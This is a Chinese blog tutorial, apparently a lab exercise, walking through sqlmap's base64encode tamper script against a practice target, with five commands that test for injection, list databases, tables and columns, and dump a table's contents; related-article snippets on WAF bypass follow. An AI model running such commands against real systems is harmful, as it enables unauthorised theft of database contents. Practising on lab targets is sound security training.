SQL注入实战————2、SQLmap中的temper使用

SQLmap Tamper 注入实战
最新推荐文章于 2025-09-21 18:49:51 发布
原创 最新推荐文章于 2025-09-21 18:49:51 发布 · 2.8k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何利用SQLmap的tamper模块进行base64加密的SQL注入攻击,包括判断注入点、获取数据库信息、表名及字段值等关键步骤。

SQLmap——tamper注入

靶机地址:http://219.153.49.228:42272/show.php?id=MQ==

首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密


发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面使用sqlmap的tamper来实现注入

1、判断是否可以注入

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode



2、爆数据库

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode --dbs

3、爆表名

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test --tables


4、爆字段名

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test -T data --columns



5、爆字段值

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test -T data -C id,main,thekey,title --dump



至此该演示结束,对于其他的tamper的使用方法也是这样,不再多说,有兴趣的可以去差寻一下tamper的各个脚本对应的信息内容!


SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
m0_69583059的博客
01-18 1694
如果在实战中我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程中,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过。
sql注入之tamper绕过WAF防火墙
weixin_33974433的博客
07-31 475
### 现象: 当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。利用sqlmap中的tamper给我们带来了很多防过滤的脚本绕过。 提示“输入内容存在危险字符,已经被拦截” 提示“请不要尝试在参数中包含非法字符尝试注入” ### 判断我们使用那种脚本 1,id...
sqlmap绕waf脚本编写(temper
最新发布
weixin_74737710的博客
09-21 688
可以通过返回图片找waf是哪一家:https://blog.youkuaiyun.com/weixin_46676743/article/details/112245605。re.sub(替换前内容,替换后,要替换值) r”” 是告诉别人这个是正则语句类似//过滤规则:检测到就删除: union => 空 uniounionn。uinon => 会把关键词替换为空 uniounionn => union。waf会拦截恶意传参你们。例 sleep() => sleep/**/()
sqlmap注入之tamper绕过WAF防火墙过滤
热门推荐
ru_li的专栏
05-19 1万+
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以
SQL注入工具sqlmap使用手记
Lisam Blog
05-08 1950
转自:http://blog.sina.com.cn/s/blog_72cbda320101966m.html 1.sqlmap的get注入 假设目标是 http://www.baidu.com/news.php?id=1&data=2 sqlmap语句 列库 sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2" --dbs
sql 数据类型注入+tamper
2202_75317918的博客
12-15 640
(开发程序里面,数字不需要单引号,字符需要单引号 双引号去概括的需要考虑到符号的闭合 才能正确去执行SQL 完成SQL注入)我在本地尝试了编码型base64
SQL注入——Sqlmap工具使用
2402_84408069的博客
05-19 1373
Sqlmap是一款基于Python开发的开源渗透测试工具,主要用于自动化检测和利用SQL注入漏洞,从而获取数据库服务器的权限。它支持多种数据库类型,能够提取数据库中的数据、访问操作系统文件,甚至通过外带数据连接执行操作系统命令。使用Sqlmap前需配置Python环境,可通过官网或GitHub下载工具。基本使用方法包括进入Sqlmap目录、执行命令查看帮助信息,并通过指定URL进行注入测试。常用技巧包括GET型注入、POST型注入和HEAD头注入,支持自动化测试、获取数据库名、表名、列名及数据等操作。
SQL注入实战——cookie注入
2301_78817088的博客
10-23 992
这次我们利用sqliabs less-20和burpsuite学习了cookie注入,找到注入点后爆破数据库等一系列信息。希望对你有所帮助!!
SQL注入使用brupSuite辅助注入sqlmap使用
05-30
通过上述介绍,我们可以看到使用Burp Suite和sqlmap可以帮助我们更好地理解和实施SQL注入测试。无论是手动还是自动化的测试方法,都需要对SQL注入原理有深刻的理解。希望本文能够帮助读者更好地掌握这些技能,提升...
详解强大的SQL注入工具——SQLMAP
05-09
SQL注入是一种常见的网络安全攻击技术,用于攻击数据驱动的应用程序,攻击者通过在应用程序的SQL命令中插入恶意SQL代码,从而控制数据库服务器。SQLMAP是一个开源的渗透测试工具,专门用于自动探测和利用SQL注入漏洞...
sql注入-WAF绕过】编写sqlmap的tamper进行sql注入
06-29 7228
【特征】特殊符号+十六进制格式
day27 SQL注入&Tamper脚本
wanjia01的博客
10-15 971
小迪安全笔记
SQL注入技巧拓展】————14、Bypass 360主机卫士SQL注入防御(附tamper脚本)
Fly_鹏程万里
12-25 536
0x01 前言   在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势。 0x02 环境搭建 Windows Server 2003+phpStudy sql注入点测试代码: sql.php <?php $con = mysql_connect("localhost","root","root"); ...
sqlmap之(四)----Mysql注入实战
fendo
02-27 5419
(1) 查找数据库 sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs 数据库有8个。 (2) 通过第一步的数据库查找表(假如数据库名为test) sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --ta
27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等
wuqingsix的博客
11-19 650
不同payload类型的注入方式构造:字符型,搜索形 ,加密,编码形。宽字节的构造和绕过, sqlmap的tamper字典使用
python渗透开发 高阶段位之 waf绕过sql注入 sqlmap --temper模块开发以及框架逻辑修改 以及解释Temper是什么?
盾悟
02-03 4188
比如控制注入的行为,或在执行过程中加入特定的操作。这种操作常见于以下场景:需要绕过 Web 应用防火墙(WAF)或其他安全设备时,通过临时添加伪造的 HTTP 头部。提供特殊的身份验证信息或自定义的请求标头。
工具使用|神器Sqlmap tamper的使用介绍
weixin_42282189的博客
11-21 3914
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 从开源软件Sqlmap学习字符的篡改,现在的web网络环境参数出入处基本都会过滤某些字符串,我们在进行sql注入时,Sqlmap这款Sql注入神器的插件就可以帮助我们(Tamper)篡改字符,实现绕过,以下为实战中常用的Tamper,建议收藏。 Sqlmap下载地址:https://github.com/sqlmapproject/sqlmap 0x02 常用Tamper 用法这里就不过多介绍了.
sqlmap实战
中国好利鹏
10-31 1800
昨天看sqlmap教程的时候,羽翼给我们提供了一个测试站点http://www.slibrary.com/link.php? id=321。我就想了想,都好几年了,这个站肯定修复好了。然后测试了一下, http://www.slibrary.com/link.php?id=321‘ http://www.slibrary.com/link.php?id=321 and 1=1 ht
掌握SQL注入利器——sqlmap-0.9版本发布
3. 自动化工具:Sqlmap可以自动探测和利用SQL注入漏洞,它使用一系列技术来检测和利用潜在的SQL注入漏洞,例如基于布尔的盲注、基于时间的盲注、基于错误的SQL注入等。 4. 命令行操作:Sqlmap是命令行界面(CLI)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值